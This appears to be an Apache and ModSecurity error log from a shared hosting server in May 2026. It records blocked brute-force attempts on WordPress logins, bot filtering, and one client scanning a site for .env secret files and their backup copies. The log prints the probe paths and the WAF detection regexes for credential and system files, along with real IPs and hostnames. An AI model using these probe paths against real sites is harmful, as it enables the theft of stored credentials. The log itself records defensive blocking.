[Tue May 26 14:26:19.668286 2026] [core:crit] [pid 610693:tid 610851] (13)Permission denied: [client 66.249.70.135:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 14:26:19.954413 2026] [core:crit] [pid 610693:tid 610891] (13)Permission denied: [client 66.249.70.136:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 14:26:20.072992 2026] [security2:error] [pid 606909:tid 607008] [remote 54.38.29.86:57722] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 86.29.38.54.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yndglobal.com"] [uri "/wp-login.php"] [unique_id "ahVgM10yRtX9qA7aVUVnvgAAkWI"]
[Tue May 26 14:26:20.269078 2026] [core:crit] [pid 606909:tid 607115] (13)Permission denied: [client 66.249.70.136:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 14:26:20.418803 2026] [security2:error] [pid 606909:tid 607142] [client 57.141.2.38:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVgM10yRtX9qA7aVUVnwAAAAOw"]
[Tue May 26 14:26:21.358423 2026] [security2:error] [pid 606909:tid 607068] [client 94.103.90.150:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVgNV0yRtX9qA7aVUVn0AAAAKI"], referer: https://www.anujtradingco.com/top-deejay-headphones/?unapproved=1419348&moderation-hash=7dbb62ec6009b8fd57931c4968ce2f90
[Tue May 26 14:26:21.987128 2026] [security2:error] [pid 610693:tid 610896] [client 57.141.2.16:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVgNTvNO3hpmlY6M8RfpAAAAEk"]
[Tue May 26 14:26:22.146023 2026] [security2:error] [pid 610693:tid 610877] [client 49.13.164.148:6392] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "ucdc.co.in"] [uri "/index.php"] [unique_id "ahVgNTvNO3hpmlY6M8RfpQAAADY"], referer: http://ucdc.co.in/
[Tue May 26 14:26:22.190760 2026] [security2:error] [pid 610693:tid 610892] [client 94.103.90.150:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVgNjvNO3hpmlY6M8RfrAAAAEU"], referer: https://anujtradingco.com/top-deejay-headphones/?unapproved=1419348&moderation-hash=7dbb62ec6009b8fd57931c4968ce2f90
[Tue May 26 14:26:22.478911 2026] [core:crit] [pid 610693:tid 610940] (13)Permission denied: [client 66.249.70.136:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 14:26:24.165476 2026] [security2:error] [pid 610693:tid 610859] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVgNzvNO3hpmlY6M8RfxQAAACQ"]
[Tue May 26 14:26:24.357142 2026] [autoindex:error] [pid 610693:tid 610918] [client 15.204.161.7:0] AH01276: Cannot serve directory /home2/glorolle/public_html/juniorwoodies.com/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 14:26:24.995449 2026] [core:crit] [pid 610693:tid 610825] (13)Permission denied: [client 66.249.70.135:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 14:26:26.164977 2026] [security2:error] [pid 610693:tid 610931] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVgOTvNO3hpmlY6M8Rf2QAAAGw"]
[Tue May 26 14:26:27.306595 2026] [security2:error] [pid 606909:tid 606936] [remote 103.230.156.120:54172] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 120.156.230.103.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "yndglobal.com"] [uri "/wp-login.php"] [unique_id "ahVgO10yRtX9qA7aVUVoAQAA2Bo"]
[Tue May 26 14:26:27.733671 2026] [security2:error] [pid 606909:tid 606941] [remote 95.216.117.13:34664] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.117.216.95.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "avprealty.com"] [uri "/wp-login.php"] [unique_id "ahVgO10yRtX9qA7aVUVoCAAAzB8"]
[Tue May 26 14:26:28.445614 2026] [security2:error] [pid 606909:tid 607160] [client 57.141.2.63:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVgO10yRtX9qA7aVUVoEQAAAP4"]
[Tue May 26 14:26:28.462293 2026] [security2:error] [pid 606909:tid 607113] [client 157.55.39.10:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "theafterglow-centre.com"] [uri "/index.php"] [unique_id "ahVgOl0yRtX9qA7aVUVn8wAAAM8"]
[Tue May 26 14:26:28.566959 2026] [security2:error] [pid 610693:tid 610944] [client 114.119.157.37:56907] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "haddingtonwines.com"] [uri "/cart"] [unique_id "ahVgPDvNO3hpmlY6M8Rf9gAAAHk"], referer: http://haddingtonwines.com/cart?remove_item=fd272fe04b7d4e68effd01bddcc6bb34
[Tue May 26 14:26:28.662451 2026] [core:crit] [pid 610693:tid 610900] (13)Permission denied: [client 66.249.70.135:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 14:26:29.389426 2026] [security2:error] [pid 610693:tid 610947] [client 202.141.83.254:53973] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 254.83.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVgPTvNO3hpmlY6M8Rf_wAAAHw"]
[Tue May 26 14:26:29.389528 2026] [security2:error] [pid 610693:tid 610947] [client 202.141.83.254:53973] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVgPTvNO3hpmlY6M8Rf_wAAAHw"]
[Tue May 26 14:26:30.342873 2026] [security2:error] [pid 610693:tid 610949] [client 57.141.2.2:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVgPTvNO3hpmlY6M8RgCQAAAH4"]
[Tue May 26 14:26:32.268384 2026] [security2:error] [pid 610693:tid 610944] [client 57.141.2.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVgPzvNO3hpmlY6M8RgLAAAAHk"]
[Tue May 26 14:26:32.723299 2026] [core:crit] [pid 610693:tid 610941] (13)Permission denied: [client 66.249.70.135:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 14:26:33.675773 2026] [core:crit] [pid 610693:tid 610939] (13)Permission denied: [client 66.249.70.135:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 14:26:33.862184 2026] [security2:error] [pid 610693:tid 610852] [client 57.141.2.71:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVgQTvNO3hpmlY6M8RgSAAAAB0"]
[Tue May 26 14:26:34.147197 2026] [core:crit] [pid 606909:tid 607112] (13)Permission denied: [client 66.249.70.135:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 14:26:35.165174 2026] [autoindex:error] [pid 606909:tid 607120] [client 208.84.101.154:3794] AH01276: Cannot serve directory /home2/svijakqj/kmmc.co.in/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 14:26:35.952948 2026] [autoindex:error] [pid 606909:tid 607058] [client 208.84.101.154:11254] AH01276: Cannot serve directory /home2/svijakqj/kmmc.co.in/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 14:26:36.930413 2026] [security2:error] [pid 610693:tid 610846] [client 57.141.2.7:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVgRDvNO3hpmlY6M8RgcwAAABc"]
[Tue May 26 14:26:37.657988 2026] [security2:error] [pid 610693:tid 610766] [remote 95.216.117.13:33442] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.117.216.95.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "friendsalongtheway.net"] [uri "/wp-login.php"] [unique_id "ahVgRTvNO3hpmlY6M8RgjQAAGEg"]
[Tue May 26 14:26:38.500644 2026] [security2:error] [pid 610693:tid 610861] [client 202.76.138.215:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVgRjvNO3hpmlY6M8RglgAAACY"]
[Tue May 26 14:26:38.678494 2026] [security2:error] [pid 610693:tid 610935] [client 57.141.2.32:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVgRjvNO3hpmlY6M8RgngAAAHA"]
[Tue May 26 14:26:38.988837 2026] [core:crit] [pid 610693:tid 610910] (13)Permission denied: [client 66.249.70.135:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 14:26:39.645775 2026] [security2:error] [pid 606909:tid 607119] [client 208.84.101.154:3794] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "kmmc.co.in.svijaykumar.in"] [uri "/.env"] [unique_id "ahVgR10yRtX9qA7aVUVofAAAANU"]
[Tue May 26 14:26:39.968428 2026] [security2:error] [pid 606909:tid 606981] [remote 74.7.241.58:59374] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahVgR10yRtX9qA7aVUVogQABAUc"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/public_html/mosykay.com/account/resources/lang/fl
[Tue May 26 14:26:39.988841 2026] [security2:error] [pid 610693:tid 610836] [client 202.141.83.254:5773] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 254.83.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVgRzvNO3hpmlY6M8RgzQAAAA0"]
[Tue May 26 14:26:39.988966 2026] [security2:error] [pid 610693:tid 610836] [client 202.141.83.254:5773] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVgRzvNO3hpmlY6M8RgzQAAAA0"]
[Tue May 26 14:26:40.442703 2026] [security2:error] [pid 610693:tid 610853] [client 208.84.101.154:3838] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "kmmc.co.in.svijaykumar.in"] [uri "/backend/.env"] [unique_id "ahVgSDvNO3hpmlY6M8Rg5AAAAB4"]
[Tue May 26 14:26:40.444106 2026] [security2:error] [pid 610693:tid 610931] [client 208.84.101.154:3834] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "kmmc.co.in.svijaykumar.in"] [uri "/api/.env"] [unique_id "ahVgSDvNO3hpmlY6M8Rg5wAAAGw"]
[Tue May 26 14:26:40.445862 2026] [security2:error] [pid 606909:tid 607093] [client 208.84.101.154:3828] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "kmmc.co.in.svijaykumar.in"] [uri "/app/.env"] [unique_id "ahVgSF0yRtX9qA7aVUVojgAAALs"]
[Tue May 26 14:26:40.790228 2026] [security2:error] [pid 610693:tid 610902] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVgSDvNO3hpmlY6M8Rg4AAAAE8"]
[Tue May 26 14:26:42.561125 2026] [autoindex:error] [pid 606909:tid 607048] [client 208.84.101.154:3958] AH01276: Cannot serve directory /home2/svijakqj/kmmc.co.in/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 14:26:42.822090 2026] [security2:error] [pid 606909:tid 607077] [client 57.141.2.21:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVgSl0yRtX9qA7aVUVoogAAAKs"]
[Tue May 26 14:26:44.361694 2026] [security2:error] [pid 610693:tid 610940] [client 57.141.2.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVgSzvNO3hpmlY6M8RhHQAAAHU"]
[Tue May 26 14:26:44.453493 2026] [security2:error] [pid 606909:tid 607047] [client 208.84.101.154:3958] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "kmmc.co.in.svijaykumar.in"] [uri "/.env.production.copy"] [unique_id "ahVgTF0yRtX9qA7aVUVoxQAAAI0"]
[Tue May 26 14:26:44.749963 2026] [core:crit] [pid 610693:tid 610885] (13)Permission denied: [client 52.167.144.166:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 14:26:46.477963 2026] [security2:error] [pid 606909:tid 607074] [client 57.141.2.21:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVgTl0yRtX9qA7aVUVo8QAAAKg"]
[Tue May 26 14:26:46.859373 2026] [security2:error] [pid 610693:tid 610910] [client 208.84.101.154:3806] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "kmmc.co.in.svijaykumar.in"] [uri "/.env.local.copy"] [unique_id "ahVgTjvNO3hpmlY6M8RhQwAAAFc"]
[Tue May 26 14:26:46.859854 2026] [security2:error] [pid 610693:tid 610949] [client 208.84.101.154:50150] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "kmmc.co.in.svijaykumar.in"] [uri "/.env.production.old"] [unique_id "ahVgTjvNO3hpmlY6M8RhRgAAAH4"]
[Tue May 26 14:26:46.860303 2026] [security2:error] [pid 610693:tid 610867] [client 208.84.101.154:50234] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "kmmc.co.in.svijaykumar.in"] [uri "/.env.production.bak"] [unique_id "ahVgTjvNO3hpmlY6M8RhRQAAACw"]
[Tue May 26 14:26:46.861103 2026] [security2:error] [pid 610693:tid 610903] [client 208.84.101.154:3920] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "kmmc.co.in.svijaykumar.in"] [uri "/.env.local.orig"] [unique_id "ahVgTjvNO3hpmlY6M8RhRAAAAFA"]
[Tue May 26 14:26:46.863364 2026] [security2:error] [pid 610693:tid 610909] [client 208.84.101.154:50210] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "kmmc.co.in.svijaykumar.in"] [uri "/.env.production.swp"] [unique_id "ahVgTjvNO3hpmlY6M8RhRwAAAFY"]
[Tue May 26 14:26:46.866518 2026] [security2:error] [pid 610693:tid 610891] [client 208.84.101.154:50224] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "kmmc.co.in.svijaykumar.in"] [uri "/.env.production.orig"] [unique_id "ahVgTjvNO3hpmlY6M8RhSAAAAEQ"]
[Tue May 26 14:26:46.944843 2026] [security2:error] [pid 606909:tid 607067] [client 208.84.101.154:50200] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "kmmc.co.in.svijaykumar.in"] [uri "/.env.production~"] [unique_id "ahVgTl0yRtX9qA7aVUVpBQAAAKE"]
[Tue May 26 14:26:46.948105 2026] [security2:error] [pid 610693:tid 610878] [client 208.84.101.154:50096] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "kmmc.co.in.svijaykumar.in"] [uri "/.env.orig"] [unique_id "ahVgTjvNO3hpmlY6M8RhUwAAADc"]
[Tue May 26 14:26:46.948109 2026] [security2:error] [pid 610693:tid 610848] [client 208.84.101.154:50132] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "kmmc.co.in.svijaykumar.in"] [uri "/.env.local.backup"] [unique_id "ahVgTjvNO3hpmlY6M8RhUQAAABk"]
[Tue May 26 14:26:46.948401 2026] [security2:error] [pid 610693:tid 610853] [client 208.84.101.154:50110] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "kmmc.co.in.svijaykumar.in"] [uri "/.env.copy"] [unique_id "ahVgTjvNO3hpmlY6M8RhUgAAAB4"]
[Tue May 26 14:26:46.948863 2026] [security2:error] [pid 610693:tid 610880] [client 208.84.101.154:50082] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "kmmc.co.in.svijaykumar.in"] [uri "/.env.swp"] [unique_id "ahVgTjvNO3hpmlY6M8RhVQAAADk"]
